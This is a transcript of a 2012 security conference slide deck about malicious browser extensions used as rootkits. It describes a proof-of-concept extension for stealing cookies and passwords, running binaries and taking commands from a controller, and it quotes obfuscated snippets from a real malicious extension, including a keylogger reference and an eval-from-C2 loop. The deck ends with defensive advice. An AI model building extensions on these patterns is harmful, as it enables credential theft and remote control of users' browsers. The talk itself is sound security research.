[eng] zombie browsers spiced with rootkit extensions - hacktivity 2012
TRANSCRIPT
![Page 1: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/1.jpg)
Introduction
Zoltán BalázsITSEC consultant
Deloitte HungaryOSCP, CISSP, C|HFI, CPTS, MCPhttp://www.slideshare.net/bz98
Cyberlympics finalsMember of the gula.sh team
![Page 2: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/2.jpg)
I love Hacking
![Page 3: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/3.jpg)
I love Zombie movies
![Page 4: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/4.jpg)
I love LOLcats
![Page 5: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/5.jpg)
Zombies + Hacking + LOLcats = I R ZOMBIE BROWSER
![Page 6: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/6.jpg)
Zombie browsers, spiced with rootkit extensions
Hacktivity 2012
• Legal disclaimer:
• Every point of views and thoughts are mine.
• The next presentation’s contents do not have any connection with my employers opinion, whether past, present or future.
• What you will hear can be only used in test labs, and only for the good.
![Page 7: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/7.jpg)
About:presentation
• History of malicious extensions (add-on, plug-in, extension, BHO)
• Focus on Firefox, Chrome, Safari
• Advantages – disadvantages
• Browser extension rootkits
• Live demo – home made extension
![Page 8: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/8.jpg)
![Page 9: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/9.jpg)
History of malicious Firefox extensions
• 90% of malicious extensions were created for Facebook spamming
• 2004-2010: 5
• 2011: 5
• Jan 01, 2012 – Oct 06, 2012: 48*
*Data from mozilla.org
![Page 10: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/10.jpg)
©f-secure
Text
More examples on Facecrook
![Page 11: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/11.jpg)
My zombie extension
• Command and Control
• Stealing cookies, passwords
• Uploading/downloading files (Firefox, Chrome NPAPI on todo list)
• Binary execution (Firefox - Windows, Chrome NPAPI on todo list)
• Geolocation
![Page 12: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/12.jpg)
![Page 13: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/13.jpg)
![Page 14: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/14.jpg)
![Page 15: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/15.jpg)
![Page 16: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/16.jpg)
![Page 17: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/17.jpg)
Safari demo
![Page 18: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/18.jpg)
Installing the extension
Physical accessSocial Engineering
Remote code execution – without user interaction
![Page 19: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/19.jpg)
Firefox rootkit 1
• Hook into other extension (even signed ones)
![Page 20: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/20.jpg)
Firefox rootkit 2
• visible = false
![Page 21: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/21.jpg)
Firefox rootkit 3
• seen in the wild
![Page 22: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/22.jpg)
Quick Quiz - for Hacker Pschorr
![Page 23: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/23.jpg)
• Which company developed the first Netscape plugin?
• *****
Quick Quiz
![Page 24: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/24.jpg)
Quick Quiz
• Which company developed the first Netscape plugin?
• A***e
![Page 25: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/25.jpg)
Quick Quiz
• Which company developed the first Netscape plugin?
• Adobe in 1995
![Page 26: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/26.jpg)
Risks of a Zombie Browser
• Eats your brain while you are asleep
![Page 27: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/27.jpg)
Risks of a Zombie Browser
![Page 28: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/28.jpg)
Risks of a Zombie Browser
• Firewall/proxy
• Local firewall
• Application whitelisting
• Web-filtering
![Page 29: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/29.jpg)
Risks of a Zombie Browser
• Cross-platform
• Cross-domain Universal XSS
• Every secret is available
• Password input method does not matter (password safe, virtual keyboard, etc.)
• Before SSL (+JS obfuscation)
• Malicious source codes are available
• Advantage against meterpreter
• exe/dll is not needed for persistence
• Writing into registry is not needed
![Page 30: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/30.jpg)
Risks of a zombie browser
• Low AV signature based detection rate
• Sample from January 2011. – October 2012.
• Extension vs. behavioral based detection
0/44
![Page 31: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/31.jpg)
Risks of a zombie browser
• Low AV signature based detection rate
• Sample from January 2011. – October 2012.
• Extension vs. behavioral based detection
0/44
![Page 32: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/32.jpg)
Friendly message to AV developers: try harder…
Code snippets from undetected malicious browser extension
var _0x39fe=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74…_0xaed4=[_0x39fe[0],_0x39fe[1],_0x39fe[2],_0x39fe[3],_0x39fe[4],_0x39fe[5],_0x39fe[6],_0x39fe[7],_0x39fe[8],_0x39fe[9]];
keylogger_namespace.keylogger…
for(var x in mothership){if (mothership[x].command == "eval") {eval(mothership[x].data);
![Page 33: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/33.jpg)
Profit ...
![Page 34: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/34.jpg)
Firefox
![Page 35: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/35.jpg)
Disadvantages (for the Hacker)
• Not a real rootkit
• Browser limitations (eg. portscan)
• Platform limitations (eg. Execute binary code only on Windows)
• Runs in user space
• Runs only when browser is open
• Extensions are not yet supported in:
• Chrome on Android/iOS
• Safari on iOS
![Page 36: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/36.jpg)
![Page 37: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/37.jpg)
Chrome - rootkit
![Page 38: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/38.jpg)
Chrome - distributed password hash cracking• Idea and coding by my friend and colleague, WoFF
• Password hash cracking performance
• Javascript: 82,000 hash/sec
• Chrome native client: 840,000 hash/sec
• Native code (john): 11,400,000 hash/sec
![Page 39: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/39.jpg)
ChromeOSDEMO
![Page 40: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/40.jpg)
ChromeOSDEMO
Not today :-(
no extension install from 3rd party site
no Flash, no Java, no NPAPI
![Page 41: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/41.jpg)
ChromeOSDEMO
Not today :-(
no extension install from 3rd party site
no Flash, no Java, no NPAPI
![Page 42: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/42.jpg)
Firefox webcam
![Page 43: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/43.jpg)
Browser extensions might be bad
• @antivirus developers
• Be reactive
• The browser is the new OS
• @browser developers (Mozilla)
• Default deny installing extensions from 3rd-party sites
• Chrome-level security
• Require permissions
• Extension components – separate privileges
• @browser developers (Google) – keep on the good job
• but disable NPAPI :)
![Page 44: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/44.jpg)
Browser extensions might be bad
• @website developers
• There is no prevention against password stealing
• Cookie-stealing
• Restrict session to IP (by default)
• @users
• Beware of malicious browser extensions
• Use separated OS for e-banking and other sensitive stuff
• Removing - create new clean profile in clean OS
• @companies
• Control which browsers users can use
• Restrict extensions via GPO
![Page 45: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/45.jpg)
![Page 46: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/46.jpg)
[email protected]/in/zbalazs
Code will be released underGPL in 2012
Greetz to @hekkcamp
Browser extensions might be bad,Mmmkay???
![Page 47: [ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012](https://reader034.vdocuments.site/reader034/viewer/2022052505/554d567ab4c90578428b46e9/html5/thumbnails/47.jpg)
References
• Grégoire Gentil: Hack any website, 2003
• Christophe Devaux, Julien Lenoir: Browser rootkits, 2008
• Duarte Silva: Firefox FFSpy PoC, 2008
• Andreas Grech: Stealing login details with a Google Chrome extension, 2010
• Matt Johansen, Kyle Osborn: Hacking Google ChromeOS, 2011
• Nicolas Paglieri: Attacking Web Browsers, 2012